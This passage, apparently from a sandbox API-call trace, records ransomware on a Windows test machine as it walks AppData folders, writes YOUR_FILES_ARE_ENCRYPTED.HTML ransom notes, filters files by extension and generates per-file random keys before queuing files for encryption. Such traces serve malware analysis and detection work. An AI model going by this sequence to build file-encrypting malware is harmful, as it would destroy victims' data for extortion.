ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.026] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, 
ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.026] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.026] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.026] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0165.026] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\identities\\{b85dca4a-5c21-4ec5-af48-a2a88cd3d1d9}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.027] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.030] CloseHandle (hObject=0x5e4) returned 1 [0165.030] GetProcessHeap () returned 0x270000 [0165.031] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0165.031] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d1c8e6, dwReserved1=0x0, cFileName="{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}", cAlternateFileName="{B85DC~1")) returned 0 [0165.031] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0165.032] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0165.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Identities\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\identities\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0165.032] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0165.035] CloseHandle (hObject=0x598) returned 1 [0165.035] GetProcessHeap () returned 0x270000 [0165.036] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.036] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x55caf3a0, ftCreationTime.dwHighDateTime=0x1d7dd5d, ftLastAccessTime.dwLowDateTime=0x66eaf130, ftLastAccessTime.dwHighDateTime=0x1d7df06, ftLastWriteTime.dwLowDateTime=0x66eaf130, ftLastWriteTime.dwHighDateTime=0x1d7df06, nFileSizeHigh=0x0, 
nFileSizeLow=0x180ad, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="l6pIAmp1Q.mkv", cAlternateFileName="L6PIAM~1.MKV")) returned 1 [0165.036] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\l6pIAmp1Q.mkv") returned 53 [0165.036] lstrcmpW (lpString1="l6pIAmp1Q.mkv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.036] PathFindExtensionW (pszPath="l6pIAmp1Q.mkv") returned=".mkv" [0165.037] lstrlenW (lpString=".mkv") returned 4 [0165.037] PathFindExtensionW (pszPath="l6pIAmp1Q.mkv") returned=".mkv" [0165.037] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x89f30b0, ftCreationTime.dwHighDateTime=0x1d7ddf7, ftLastAccessTime.dwLowDateTime=0xcc7b0720, ftLastAccessTime.dwHighDateTime=0x1d7e4b4, ftLastWriteTime.dwLowDateTime=0xcc7b0720, ftLastWriteTime.dwHighDateTime=0x1d7e4b4, nFileSizeHigh=0x0, nFileSizeLow=0x591f, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="MbOel2sTiSRFkd2I.png", cAlternateFileName="MBOEL2~1.PNG")) returned 1 [0165.037] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\MbOel2sTiSRFkd2I.png") returned 60 [0165.037] lstrcmpW (lpString1="MbOel2sTiSRFkd2I.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.037] PathFindExtensionW (pszPath="MbOel2sTiSRFkd2I.png") returned=".png" [0165.037] lstrlenW (lpString=".png") returned 4 [0165.037] PathFindExtensionW (pszPath="MbOel2sTiSRFkd2I.png") returned=".png" [0165.037] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\MbOel2sTiSRFkd2I.png" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\mboel2stisrfkd2i.png"), dwDesiredAccess=0xc0010000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0165.038] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=22815) returned 1 [0165.038] GetProcessHeap () returned 0x270000 [0165.038] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0165.039] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="13") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="AA") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="44") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="80") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="DF") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="A8") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="DB") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="E0") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="EA") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="40") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="B9") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D5") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="76") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="11") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="F0") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F3") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="FF") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda7a, 
param_2="%02X" | out: param_1="07") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="37") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="D7") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="B8") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="7F") returned 2 [0165.039] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="8E") returned 2 [0165.040] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="99") returned 2 [0165.040] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="9A") returned 2 [0165.040] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="E0") returned 2 [0165.040] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="0F") returned 2 [0165.040] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="C8") returned 2 [0165.040] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="E6") returned 2 [0165.040] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="6C") returned 2 [0165.040] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="5A") returned 2 [0165.040] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="45") returned 2 [0165.041] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\MbOel2sTiSRFkd2I.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\MbOel2sTiSRFkd2I.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\MbOel2sTiSRFkd2I.png" [0165.041] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.041] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0165.047] FindNextFileW (in: hFindFile=0x42f3180, 
lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x2ae8f460, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x2ae8f460, ftLastWriteTime.dwHighDateTime=0x1d709ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0165.047] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft") returned 49 [0165.047] GetProcessHeap () returned 0x270000 [0165.047] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0165.058] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft" [0165.058] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\*" [0165.059] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x2ae8f460, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x2ae8f460, ftLastWriteTime.dwHighDateTime=0x1d709ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0165.059] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x2ae8f460, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x2ae8f460, ftLastWriteTime.dwHighDateTime=0x1d709ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.059] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0165.059] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns") returned 56 [0165.059] GetProcessHeap () returned 0x270000 [0165.059] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.060] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns" [0165.060] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns\\*" [0165.060] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x4ebd53c | out: 
lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.061] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.061] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbb202220, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbb202220, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbb202220, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.061] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.062] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0165.062] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\AddIns\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\addins\\your_files_are_encrypted.html"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.062] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.065] CloseHandle (hObject=0x5e4) returned 1 [0165.065] GetProcessHeap () returned 0x270000 [0165.066] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.067] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1877c0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb1877c0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0165.067] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography") returned 62 [0165.067] GetProcessHeap () returned 0x270000 [0165.067] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.067] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography" [0165.067] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\*") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\*" [0165.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1877c0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb1877c0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.067] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1877c0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb1877c0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.067] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb1ad920, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Style", cAlternateFileName="")) returned 1 [0165.068] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned 68 [0165.068] GetProcessHeap () returned 0x270000 [0165.068] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, 
Size=0x10000) returned 0x74c2008 [0165.068] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" [0165.068] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*" [0165.068] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb1ad920, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.071] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1ad920, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb1ad920, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.071] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1877c0, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1877c0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6e255db0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x51722, dwReserved0=0x0, dwReserved1=0x60, cFileName="APASixthEditionOfficeOnline.xsl", cAlternateFileName="APASIX~1.XSL")) returned 1 [0165.071] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl") returned 100 [0165.071] lstrcmpW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.071] PathFindExtensionW (pszPath="APASixthEditionOfficeOnline.xsl") returned=".xsl" [0165.071] lstrlenW (lpString=".xsl") returned 4 [0165.071] PathFindExtensionW (pszPath="APASixthEditionOfficeOnline.xsl") returned=".xsl" [0165.071] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1877c0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1877c0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x6dff47b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x48839, dwReserved0=0x0, dwReserved1=0x60, cFileName="CHICAGO.XSL", cAlternateFileName="")) returned 1 [0165.071] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL") returned 80 [0165.071] lstrcmpW (lpString1="CHICAGO.XSL", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.071] PathFindExtensionW (pszPath="CHICAGO.XSL") returned=".XSL" [0165.071] lstrlenW (lpString=".XSL") returned 4 [0165.071] PathFindExtensionW (pszPath="CHICAGO.XSL") returned=".XSL" [0165.071] FindNextFileW (in: 
